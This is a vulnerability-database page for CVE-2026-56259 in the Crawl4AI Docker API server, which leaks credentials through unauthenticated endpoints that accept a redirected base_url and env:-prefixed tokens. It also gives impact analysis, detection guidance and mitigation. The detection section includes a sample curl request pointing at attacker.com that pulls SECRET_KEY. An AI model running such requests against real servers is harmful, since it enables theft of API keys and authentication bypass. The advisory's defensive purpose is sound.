CVE-2026-56259
Received Received - Intake

Crawl4AI Credential Exfiltration via Unauthenticated API Endpoints

Vulnerability report for CVE-2026-56259, including description, CVSS score, EPSS score, affected products, exploitability, helpful resources, and attack-flow context.

Publication date: 2026-07-12

Last updated on: 2026-07-12

Assigner: VulnCheck

Description

Crawl4AI before 0.8.8 contains credential exfiltration vulnerabilities in the Docker API server that allow attackers to redirect LLM API calls to attacker-controlled endpoints and read arbitrary environment variables. Attackers can exploit the unauthenticated /md, /llm, and /llm/job endpoints by supplying a malicious base_url parameter and setting api_token to env:VARIABLE_NAME to exfiltrate provider API keys and server secrets including JWT SECRET_KEY for authentication bypass.

CVSS Scores

EPSS Scores

Probability:
Percentile:

Meta Information

Published
2026-07-12
Last Modified
2026-07-12
Generated
2026-07-12
AI Q&A
2026-07-12
EPSS Evaluated
N/A
NVD
EUVD

Affected Vendors & Products

Currently, no data is known.

Helpful Resources

Exploitability

CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-200 The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.

Attack-Flow Graph

AI Quick Actions

Instant insights powered by AI
Executive Summary

CVE-2026-56259 is a high-severity vulnerability in Crawl4AI versions before 0.8.8 that affects the Docker API server component. It allows attackers to exfiltrate credentials by exploiting unauthenticated endpoints (/md, /llm, and /llm/job). Attackers can manipulate the base_url parameter to redirect LLM API calls to attacker-controlled servers and use the api_token parameter with a special env:VARIABLE_NAME syntax to read arbitrary environment variables. This enables them to steal sensitive information such as provider API keys, server secrets, and the JWT SECRET_KEY, which can be used to bypass authentication.

Compliance Impact

The vulnerability allows attackers to exfiltrate sensitive credentials and environment variables, including provider API keys and server secrets such as JWT SECRET_KEY, which can lead to authentication bypass and exposure of confidential information.

Such exposure of sensitive information can negatively impact compliance with data protection standards and regulations like GDPR and HIPAA, which require the protection of personal and sensitive data against unauthorized access and breaches.

Specifically, the unauthorized disclosure of secrets and credentials could lead to data breaches, undermining confidentiality and potentially resulting in regulatory penalties or loss of trust.

Mitigation steps include upgrading to the fixed version 0.8.8, enabling authentication, and avoiding storing sensitive secrets in the server environment alongside provider keys to reduce the risk of non-compliance.

Impact Analysis

This vulnerability can have serious impacts including unauthorized access to sensitive credentials and secrets stored in the server environment. Attackers can redirect legitimate API calls to their own servers, capturing provider API keys and secrets. Compromise of the JWT SECRET_KEY can lead to authentication bypass, allowing attackers to impersonate legitimate users or services. Overall, this results in a significant confidentiality breach and potential unauthorized access to protected resources.

Detection Guidance

Detection of this vulnerability involves monitoring for unauthorized or suspicious requests to the unauthenticated endpoints /md, /llm, and /llm/job on the Crawl4AI Docker API server.

Specifically, look for requests that include a manipulated base_url parameter or api_token values starting with env:, which indicate attempts to redirect API calls or exfiltrate environment variables.

Network or system administrators can use command-line tools such as curl or tcpdump to inspect traffic and test for the vulnerability.

  • Use curl to send a test request to the vulnerable endpoints with a malicious base_url parameter and api_token set to env:VARIABLE_NAME to see if the server responds with environment variable data.
  • Example curl command: curl -v 'http://<server-address>/llm?base_url=http://attacker.com&api_token=env:SECRET_KEY'
  • Use tcpdump or Wireshark to capture and analyze network traffic for suspicious requests targeting the /md, /llm, or /llm/job endpoints with unusual query parameters.
Mitigation Strategies

Immediate mitigation steps include upgrading Crawl4AI to version 0.8.8 or later, where the vulnerability is fixed by ignoring request-supplied base_url values and restricting env: token resolution for sensitive environment variables.

Additionally, enable authentication on the Crawl4AI server using the CRAWL4AI_API_TOKEN environment variable to prevent unauthenticated access to sensitive endpoints.

Avoid storing sensitive secrets such as SECRET_KEY or provider API keys in the server environment alongside the Crawl4AI service to reduce the risk of exfiltration.

Chat Assistant

Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-56259. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70

EPSS Chart